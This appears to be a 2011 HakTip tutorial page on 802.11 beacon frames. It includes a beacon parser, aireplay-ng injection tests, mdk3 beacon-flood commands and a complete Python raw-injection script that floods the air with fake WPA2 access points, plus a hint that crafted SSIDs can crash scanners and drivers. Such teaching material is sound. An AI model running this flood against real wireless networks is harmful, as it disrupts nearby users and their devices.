HakTip

Hosted by Darren Kitchen and Shannon Morse.

Whether you're a beginner or a pro, HakTip is essential viewing for current and aspiring hackers, computer enthusiasts, and IT professionals. With a how-to approach to all things Information Technology, HakTip breaks down the core concepts, tools, and techniques of Linux, Wireless Networks, Systems Administration, and more.

WiFi 101: Beacon Frames and Injection

Monday, July 25th, 2011 – running time 07:52

Today we're following up our discussion on 802.11 frames with an investigation of beacons and a practical example using BackTrack Linux and a technique known as raw frame injection.

As you recall from last time, the beacon frame is one of the 802.11 management frame subtypes. The others include association, authentication and probe frames, which we'll be getting into shortly.

Now the beacon frame is a special kind of management frame, as it advertises information about the network. That brings us to a definition:

Beacon frames, or simply beacons, are transmitted periodically by base stations or access points to announce the presence of wireless networks. The beacon frame is made up of several parts, including:

Whether the network is ad-hoc (IBSS) or infrastructure (ESS, which a client sees as managed mode); these are two bits of the capability field.

The SSID or network name. We'll be getting more into service sets of 802.11 networks, but for now the SSID is a string of up to 32 bytes, typically human-readable, that names the network. Note that it is the BSSID, the access point's MAC address, and not the SSID that uniquely identifies a particular base station: several access points can share one SSID, and the SSID field can even be left empty for a "hidden" network.

The Timestamp

The timestamp is quite simply a 64-bit counter of microseconds (the access point's TSF timer) to which all associating stations synchronize. It's like that scene in the movie where all the spies synchronize their watches, except that it happens in hex in the blink of an eye.

And, alongside the capability information, a set of tagged parameters such as:

Channel Information

Supported data rates

Typically access points are set up to broadcast a beacon every 100 time units (a time unit is 1024 microseconds), so roughly ten times a second rather than every ten seconds. That can add quite a bit of airtime overhead, so for improved performance on networks where not a lot of clients are connecting and disconnecting, like a home network, the beacon interval is often raised.
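To make the fields above concrete, here is a small parser for a beacon frame, as an added example written for this page rather than code from the episode. The beacon it parses is constructed by hand, not captured: the MAC addresses, SSID and timestamp are made up, and the frame is shown without the trailing FCS, the way most capture tools hand it over.

```python
import struct

# Information element (IE) tags used below; everything after the fixed
# fields of a beacon body is a sequence of tag, length, value triples.
IE_SSID, IE_RATES, IE_DS_PARAM, IE_RSN, IE_EXT_RATES = 0, 1, 3, 48, 50
CIPHER_NAMES = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}
AKM_NAMES = {1: "802.1X", 2: "PSK"}

# Constructed sample beacon (no FCS), not a real capture: the MAC
# addresses, SSID and timestamp are made up for this example.
SAMPLE_BEACON = bytes.fromhex(
    "8000" "0000"               # frame control: management/beacon; duration
    "ffffffffffff"              # addr1: broadcast
    "001122334455"              # addr2: transmitter (the AP)
    "001122334455"              # addr3: BSSID
    "1020"                      # sequence control
    "40e2010000000000"          # timestamp: TSF in microseconds (LE), 123456
    "6400"                      # beacon interval: 100 TU (LE)
    "1104"                      # capability: ESS, privacy, short slot time
    "000648616b546970"          # IE 0 SSID "HakTip"
    "010882848b960c121824"      # IE 1 supported rates 1..18 Mbps
    "03010b"                    # IE 3 DS parameter set: channel 11
    "3014" "0100" "000fac04"    # IE 48 RSN: version 1, group cipher CCMP
    "0100" "000fac04"           #   one pairwise cipher: CCMP
    "0100" "000fac02"           #   one AKM suite: PSK
    "0000"                      #   RSN capabilities
    "32043048606c"              # IE 50 extended rates 24..54 Mbps
)


def suite_name(suite, table):
    """Decode a 4-byte RSN suite selector (3-byte OUI + 1-byte type)."""
    if len(suite) != 4:
        return "truncated"
    if suite[:3] != b"\x00\x0f\xac":
        return "vendor:" + suite.hex()
    return table.get(suite[3], f"unknown-{suite[3]}")


def parse_rsn(val):
    """Parse the RSN IE body; stops at the first field that runs past the IE."""
    if len(val) < 8:
        return None
    version, = struct.unpack_from("<H", val, 0)
    rsn = {"version": version, "group": suite_name(val[2:6], CIPHER_NAMES),
           "pairwise": [], "akm": []}
    off = 6
    for key, table in (("pairwise", CIPHER_NAMES), ("akm", AKM_NAMES)):
        if off + 2 > len(val):
            return rsn
        count, = struct.unpack_from("<H", val, off)
        off += 2
        if off + 4 * count > len(val):
            return rsn          # the count lies about the IE length: do not read past it
        rsn[key] = [suite_name(val[off + 4 * i:off + 4 * i + 4], table)
                    for i in range(count)]
        off += 4 * count
    return rsn


def parse_beacon(frame):
    """Return the fields a scanner would show for one beacon frame (no FCS)."""
    if len(frame) < 36:
        raise ValueError("too short for a beacon")
    fc = frame[0]
    if (fc >> 2) & 0x3 != 0 or (fc >> 4) & 0xF != 8:
        raise ValueError("not a management/beacon frame")
    timestamp, interval_tu, cap = struct.unpack_from("<QHH", frame, 24)
    info = {
        "bssid": ":".join(f"{b:02x}" for b in frame[16:22]),
        "timestamp_us": timestamp,
        "beacon_interval_tu": interval_tu,
        "beacon_interval_ms": interval_tu * 1024 / 1000,      # 1 TU = 1024 us
        "mode": "infrastructure" if cap & 0x1 else ("ad-hoc" if cap & 0x2 else "unknown"),
        "privacy": bool(cap & 0x10),
        "ssid": None, "channel": None, "rates_mbps": [], "rsn": None,
    }
    off = 36                                   # first IE follows the fixed fields
    while off + 2 <= len(frame):
        tag, length = frame[off], frame[off + 1]
        val = frame[off + 2:off + 2 + length]
        if len(val) < length:
            break                              # truncated IE: stop, never read past the frame
        off += 2 + length
        if tag == IE_SSID:
            info["ssid"] = val.decode("utf-8", "replace")     # empty when the SSID is hidden
        elif tag in (IE_RATES, IE_EXT_RATES):
            info["rates_mbps"] += [(r & 0x7F) / 2 for r in val]  # 500 kbps units; top bit = basic rate
        elif tag == IE_DS_PARAM and length == 1:
            info["channel"] = val[0]
        elif tag == IE_RSN:
            info["rsn"] = parse_rsn(val)
    return info


if __name__ == "__main__":
    for key, value in parse_beacon(SAMPLE_BEACON).items():
        print(f"{key:>19}: {value}")
```

The bounds checks matter more than they look: a malformed IE length or RSN suite count is exactly the kind of input that trips up the scanners and drivers mentioned later in the episode, and a parser that trusts those fields reads past the end of the frame.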

MDK3 is a tool that exploits weaknesses in 802.11 protocols. It was created by ASPj (Pedro Larbig) with the help of the aircrack-ng team and libraries. MDK3 can be found on Pedro Larbig's homepage and is built into the latest version of BackTrack from backtrack-linux.org.

Today we're using MDK3 in our practical example of transmitting and analyzing beacon frames.

To achieve this we'll first need a card capable of raw frame injection. To test whether our card has this capability we'll use the aireplay-ng tool, which is part of the aircrack-ng suite.

Aireplay-ng is a tool for injecting wireless frames and can accomplish 10 basic WiFi attacks, including deauthentication, fake authentication, fragmentation and more. We'll be getting more in depth with the aireplay-ng tool soon, but for today we'll be using mode 9, also known as test mode.

Now before we can use either aireplay-ng or MDK3 we'll need to bring up a monitor interface for our card, or set our card in monitor mode. If you recall from a previous episode, the easiest way to do this is with the command airmon-ng start followed by our interface name.

airmon-ng start wlan2

Now that our card has been set to monitor mode and we have the monitor interface mon0, we can proceed to test our NIC.

Issuing aireplay-ng -9 (or --test) against the monitor interface (which in our case is mon0, on top of wlan2) we can test whether or not our radio can handle raw frame injection.

aireplay-ng -9 mon0

Our test is complete and we can see that aireplay-ng reports "Injection is working!"

Now on to MDK3, which is capable of performing many modes of attack. Issuing mdk3 at the command prompt with no arguments will display a brief description of them.

mdk3 | more

Today we're focusing on the beacon flood mode. For more information on any mode, issue mdk3 --help followed by the mode letter. So for beacon flood mode we'll issue

mdk3 --help b

Alternatively we could issue mdk3 --fullhelp for information on all attack modes.

So now, finally, to craft our beacon flood: we can see here that -f reads SSIDs from a text file, -g advertises the fake stations as 802.11g at 54 Mbps, -a advertises them as using WPA with AES (CCMP) encryption, and -c sets the channel the fake access points claim to be on in their DS parameter set. Note that -c only changes what the beacons say; the card keeps transmitting on whatever channel it is tuned to unless -h is also given to make it hop there.

Thankfully I already have a text file full of SSIDs handy so let's just issue

mdk3 mon0 b -f ssid.list -g -a -c 11

Now as you can see, mdk3 is transmitting hundreds of beacons on channel 11 for the SSIDs I've specified, each one from its own randomly generated BSSID.

We can verify this using our other wireless interface by scanning for all nearby networks with the command:

iwlist wlan0 scan | grep ESSID

Now, similar to fuzzing, this sort of attack can sometimes break WiFi scanners or network interface drivers, since they end up parsing hundreds of frames with SSIDs and lengths they never expected. And with a specially crafted SSID list I'm sure you can come up with your own fun.

Mind you, all of these BSSIDs (MAC addresses) are random, and there's no chance of anyone actually associating with these base stations, since nothing is listening to answer an authentication or association request. At least not yet.
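Here is what mdk3 mon0 b -f ssid.list -g -a -c 11 puts on the air, byte for byte, as an added example written for this page rather than code from mdk3 or the episode. It builds one beacon per SSID for a fake 802.11g access point advertising WPA2 with AES (CCMP), a random locally administered BSSID and channel 11 in the DS parameter set, and injects the frames through a raw AF_PACKET socket with a minimal radiotap header in front of each one. The interface name mon0, the file name ssid.list and the script name are assumptions; sending requires Linux, an interface already in monitor mode and CAP_NET_RAW (root), and, like mdk3 without -h, it does not tune the radio to the channel the beacons claim.

```python
import os
import socket
import struct

# Minimal radiotap header: version 0, pad, length 8 (LE), no fields present.
# Linux mac80211 monitor interfaces accept this in front of a raw 802.11 frame.
RADIOTAP_MIN = bytes([0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00])

# 802.11g rate sets in units of 500 kbps; the top bit marks a basic rate.
G_RATES = bytes([0x82, 0x84, 0x8B, 0x96, 0x0C, 0x12, 0x18, 0x24])   # 1..18 Mbps
G_EXT_RATES = bytes([0x30, 0x48, 0x60, 0x6C])                       # 24..54 Mbps

# RSN IE body advertising WPA2 with CCMP (AES) and a pre-shared key.
RSN_CCMP_PSK = (struct.pack("<H", 1)                              # version
                + b"\x00\x0f\xac\x04"                            # group cipher: CCMP
                + struct.pack("<H", 1) + b"\x00\x0f\xac\x04"     # one pairwise cipher: CCMP
                + struct.pack("<H", 1) + b"\x00\x0f\xac\x02"     # one AKM suite: PSK
                + struct.pack("<H", 0))                           # RSN capabilities


def ie(tag, value):
    """One information element: tag, length, value."""
    return bytes([tag, len(value)]) + value


def random_bssid():
    """Random unicast, locally administered MAC, so it never claims a real vendor OUI."""
    b = bytearray(os.urandom(6))
    b[0] = (b[0] | 0x02) & 0xFE
    return bytes(b)


def build_beacon(ssid, bssid, channel, seq, timestamp_us=0, interval_tu=100):
    """Beacon frame (no FCS; the driver appends it) for one fake 802.11g/WPA2-AES AP."""
    ssid_bytes = ssid.encode("utf-8")[:32]               # an SSID is at most 32 bytes
    header = struct.pack("<HH6s6s6sH",
                         0x0080,                          # frame control: management/beacon
                         0,                               # duration
                         b"\xff" * 6,                     # addr1: broadcast
                         bssid,                           # addr2: transmitter
                         bssid,                           # addr3: BSSID
                         (seq & 0xFFF) << 4)              # sequence control (fragment 0)
    capability = 0x0001 | 0x0010 | 0x0400                 # ESS, privacy, short slot time
    body = struct.pack("<QHH", timestamp_us, interval_tu, capability)
    body += (ie(0, ssid_bytes) + ie(1, G_RATES) + ie(3, bytes([channel]))
             + ie(48, RSN_CCMP_PSK) + ie(50, G_EXT_RATES))
    return header + body


def load_ssids(path):
    """Read one SSID per line, skipping blank lines, like mdk3's -f option."""
    with open(path, encoding="utf-8") as f:
        return [line.rstrip("\r\n") for line in f if line.strip()]


def beacon_flood(ssids, channel, rounds=1):
    """One random BSSID per SSID, `rounds` beacons each, with advancing sequence
    numbers and timestamps the way a real access point would send them."""
    aps = [(ssid, random_bssid()) for ssid in ssids]
    frames = []
    for r in range(rounds):
        for ssid, bssid in aps:
            frames.append(build_beacon(ssid, bssid, channel, seq=r,
                                       timestamp_us=r * 100 * 1024))   # one interval apart
    return frames


def send_frames(iface, frames):
    """Inject raw frames on a Linux monitor-mode interface (needs CAP_NET_RAW)."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    sock.bind((iface, 0))
    try:
        for frame in frames:
            sock.send(RADIOTAP_MIN + frame)
    finally:
        sock.close()


if __name__ == "__main__":
    import sys
    # assumed usage: python3 beacon_flood.py mon0 ssid.list 11
    iface, path, chan = sys.argv[1], sys.argv[2], int(sys.argv[3])
    send_frames(iface, beacon_flood(load_ssids(path), chan, rounds=100))
```

Nothing here answers authentication or association requests, which is why a client that picks one of these networks simply times out; a scanner such as iwlist only needs the beacons to list them. The 32-byte cap on the SSID is the one place this code is stricter than a crafted SSID list would allow; drop it only if you intend to test how a scanner copes with an oversized IE.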

What programs or commands are rocking your world? What technologies are tickling your technolust? Hit me up -- tips@hak5.org

And be sure to check out our sister show, Hak5 for more great stuff just like this.


Squarespace

Squarespace is a publishing system for anyone looking to build a blog, portfolio or any kind of website. Squarespace offers a uniquely flexible tool for just about anyone (no coding experience required) to build high end websites with that same functionality that you will find on some of the highest trafficked pages on the web. Squarespace also has amazing iPhone and iPad apps so you can easily update your blog and manage comments on the go. Go to www.squarespace.com to get a 2-week free trial and 10% off when you sign up in July. Just enter coupon code hak57.


About the Show

Details
Show Title:
HakTip
Description:
Whether you're a beginner or a pro, HakTip is essential viewing for current and aspiring hackers, computer enthusiasts, and IT professionals. With a how-to approach to all things Information Technology, HakTip breaks down the core concepts, tools, and techniques of Linux, Wireless Networks, Systems Administration, and more
Categories:
How-To & DIY, Technology & Gadgets
Launch Date:
May 23, 2011